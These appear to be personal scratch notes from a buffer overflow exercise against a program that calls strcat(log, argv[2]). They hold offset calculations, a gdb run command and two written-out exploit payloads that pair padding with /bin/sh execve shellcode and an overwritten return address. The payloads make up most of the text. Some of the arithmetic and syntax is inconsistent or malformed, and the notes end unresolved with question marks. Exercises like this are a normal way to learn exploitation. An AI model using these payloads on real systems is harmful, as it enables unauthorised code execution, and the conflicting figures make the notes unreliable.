log size = 255

buffer overflow at 101 (strcat(log, argv[2])

main return address: 0x17f3
strcat call address: 0x527e

247 to overwrite buffer
43 extra padding
8 saved pointer
8 return address

r ci $(python -c 'print("A"*+"A"*127+"ABCDEFGHIJKLMNOP")')

ra = 0x4242...42

buffer begins at: 0x7663622e?

attack: "A"*241+"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8
d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x
41\x42\x42\x42\x42"+"\x50\xe8\xfe\xff\xff\xff\xff\x7f"

"A"*267 + \x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05 + "\x10\xe9\xfe\xff\xff\xff\xff\x7f"
?
